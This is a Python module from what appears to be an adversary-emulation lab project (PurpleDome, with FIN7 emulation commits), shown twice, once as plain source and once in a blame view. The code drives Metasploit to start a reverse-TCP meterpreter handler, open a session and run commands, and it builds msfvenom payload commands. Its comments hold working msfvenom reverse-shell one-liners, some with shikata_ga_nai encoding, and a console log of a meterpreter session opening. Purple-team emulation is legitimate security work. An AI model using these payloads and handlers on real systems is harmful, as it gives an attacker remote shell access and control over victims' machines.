PurpleDome/app/metasploit.py

#!/usr/bin/env python3

from pymetasploit3.msfrpc import MsfRpcClient
from app.machinecontrol import Machine

# https://github.com/DanMcInerney/pymetasploit3

# Requirements
# TODO Connect to metasploit on kali machine
# TODO Multi sessions
# Add msfvenom class to generate payloads and fetch them


class Metasploit():
    def __init__(self, password, **kwargs):
        """

        :param password: password for the msfrpcd
        :param kwargs: Relevant ones: uri, port, server, username
        """

        self.client = MsfRpcClient(password, **kwargs)

        # Waiting for reverse shell
        exploit = self.client.modules.use('exploit', 'exploit/multi/handler')
        print(exploit.description)
        print(exploit.missing_required)
        payload = self.client.modules.use('payload', 'linux/x64/meterpreter_reverse_tcp')
        print(payload.description)
        print(payload.missing_required)
        payload["LHOST"] = "192.168.178.125"

        res = exploit.execute(payload=payload)
        print(res)
        print(self.client.sessions.list)
        sid = list(self.client.sessions.list)[0]

        shell = self.client.sessions.session(sid)
        shell.write("getuid")
        print(shell.read())


class MSFVenom():
    def __init__(self, attacker: Machine, target: Machine):
        """

        :param attacker: attacker machine
        """
        # https://www.offensive-security.com/metasploit-unleashed/msfvenom/

        self.attacker = attacker
        self.target = target

    def generate_cmd(self, **kwargs):
        """ Generates a cmd


        :return:
        """
        payload = kwargs.get("payload", None)
        architecture = kwargs.get("architecture", None)
        platform = kwargs.get("platform", self.target.get_os())
        lhost = kwargs.get("lhost", self.attacker.get_ip())
        format = kwargs.get("format", None)  # file format
        outfile = kwargs.get("outfile", "exploit.exe")

        cmd = "msfvenom"
        if architecture is not None:
            cmd += f" -a {architecture}"
        if platform is not None:
            cmd += f" --platform {platform}"
        if payload is not None:
            cmd += f" -p {payload}"
        if lhost is not None:
            cmd += f" LHOST={lhost}"
        if format is not None:
            cmd += f" -f {format}"
        if outfile is not None:
            cmd += f" -o {outfile}"

        # -p payload  linux/x86/meterpreter_reverse_tcp
        # -f format: elf, exe, powershell, python
        # --platform: linux, windows, osx
        # -a arch: x86, x64
        # -e encoders: x86/shikata_ga_nai
        # -b bad chars to avoid
        # -i iterations. encoding iterations
        # -o <filename> out filename
        # root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python
        # complex: msfvenom -a x86 --platform linux -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.178.125 -e x86/shikata_ga_nai -i 3 -f elf -o reverse_meterpreter

        # verified to work (Linux): msfvenom -a x64 --platform linux -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.178.125  -f elf -o reverse_meterpreter

        # Keep in mind: The msfconsole needs to actively listen to the connection:
        # msf6 > use exploit/multi/handler
        # [*] Using configured payload generic/shell_reverse_tcp
        # msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
        # payload => linux/x64/meterpreter_reverse_tcp
        # msf6 exploit(multi/handler) > set lhost 192.168.178.125
        # lhost => 192.168.178.125
        # msf6 exploit(multi/handler) > set lport 4444
        # lport => 4444
        # msf6 exploit(multi/handler) > run
        #
        # [*] Started reverse TCP handler on 192.168.178.125:4444
        # [*] Meterpreter session 1 opened (192.168.178.125:4444 -> 192.168.178.125:42436) at 2021-06-01 03:32:12 -0400
        #
        # meterpreter >   !!! We are in the session now !!!

        return cmd

    def generate_payload(self, **kwargs):
        """ Generates a payload on the attacker machine

        """
        cmd = self.generate_cmd(**kwargs)

        self.attacker.remote_run(cmd)
Adding first metasploit steps for FIN7 3 years ago			`#!/usr/bin/env python3`

			`from pymetasploit3.msfrpc import MsfRpcClient`
			`from app.machinecontrol import Machine`

			`# https://github.com/DanMcInerney/pymetasploit3`
Concepts for adversary emulation: FIN7 3 years ago
			`# Requirements`
			`# TODO Connect to metasploit on kali machine`
			`# TODO Multi sessions`
Adding first metasploit steps for FIN7 3 years ago			`# Add msfvenom class to generate payloads and fetch them`


			`class Metasploit():`
			`def __init__(self, password, **kwargs):`
			`"""`

			`:param password: password for the msfrpcd`
			`:param kwargs: Relevant ones: uri, port, server, username`
			`"""`

			`self.client = MsfRpcClient(password, **kwargs)`

			`# Waiting for reverse shell`
			`exploit = self.client.modules.use('exploit', 'exploit/multi/handler')`
			`print(exploit.description)`
			`print(exploit.missing_required)`
			`payload = self.client.modules.use('payload', 'linux/x64/meterpreter_reverse_tcp')`
			`print(payload.description)`
			`print(payload.missing_required)`
			`payload["LHOST"] = "192.168.178.125"`

			`res = exploit.execute(payload=payload)`
			`print(res)`
			`print(self.client.sessions.list)`
			`sid = list(self.client.sessions.list)[0]`

			`shell = self.client.sessions.session(sid)`
			`shell.write("getuid")`
			`print(shell.read())`


			`class MSFVenom():`
			`def __init__(self, attacker: Machine, target: Machine):`
			`"""`

			`:param attacker: attacker machine`
			`"""`
			`# https://www.offensive-security.com/metasploit-unleashed/msfvenom/`

			`self.attacker = attacker`
			`self.target = target`

			`def generate_cmd(self, **kwargs):`
			`""" Generates a cmd`


			`:return:`
			`"""`
			`payload = kwargs.get("payload", None)`
			`architecture = kwargs.get("architecture", None)`
			`platform = kwargs.get("platform", self.target.get_os())`
			`lhost = kwargs.get("lhost", self.attacker.get_ip())`
			`format = kwargs.get("format", None) # file format`
			`outfile = kwargs.get("outfile", "exploit.exe")`

			`cmd = "msfvenom"`
			`if architecture is not None:`
			`cmd += f" -a {architecture}"`
			`if platform is not None:`
			`cmd += f" --platform {platform}"`
			`if payload is not None:`
			`cmd += f" -p {payload}"`
			`if lhost is not None:`
			`cmd += f" LHOST={lhost}"`
			`if format is not None:`
			`cmd += f" -f {format}"`
			`if outfile is not None:`
			`cmd += f" -o {outfile}"`

			`# -p payload linux/x86/meterpreter_reverse_tcp`
			`# -f format: elf, exe, powershell, python`
			`# --platform: linux, windows, osx`
			`# -a arch: x86, x64`
			`# -e encoders: x86/shikata_ga_nai`
			`# -b bad chars to avoid`
			`# -i iterations. encoding iterations`
			`# -o <filename> out filename`
			`# root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python`
			`# complex: msfvenom -a x86 --platform linux -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.178.125 -e x86/shikata_ga_nai -i 3 -f elf -o reverse_meterpreter`

			`# verified to work (Linux): msfvenom -a x64 --platform linux -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.178.125 -f elf -o reverse_meterpreter`

			`# Keep in mind: The msfconsole needs to actively listen to the connection:`
			`# msf6 > use exploit/multi/handler`
			`# [*] Using configured payload generic/shell_reverse_tcp`
			`# msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp`
			`# payload => linux/x64/meterpreter_reverse_tcp`
			`# msf6 exploit(multi/handler) > set lhost 192.168.178.125`
			`# lhost => 192.168.178.125`
			`# msf6 exploit(multi/handler) > set lport 4444`
			`# lport => 4444`
			`# msf6 exploit(multi/handler) > run`
			`#`
			`# [*] Started reverse TCP handler on 192.168.178.125:4444`
			`# [*] Meterpreter session 1 opened (192.168.178.125:4444 -> 192.168.178.125:42436) at 2021-06-01 03:32:12 -0400`
			`#`
			`# meterpreter > !!! We are in the session now !!!`

			`return cmd`

			`def generate_payload(self, **kwargs):`
			`""" Generates a payload on the attacker machine`

			`"""`
			`cmd = self.generate_cmd(**kwargs)`

			`self.attacker.remote_run(cmd)`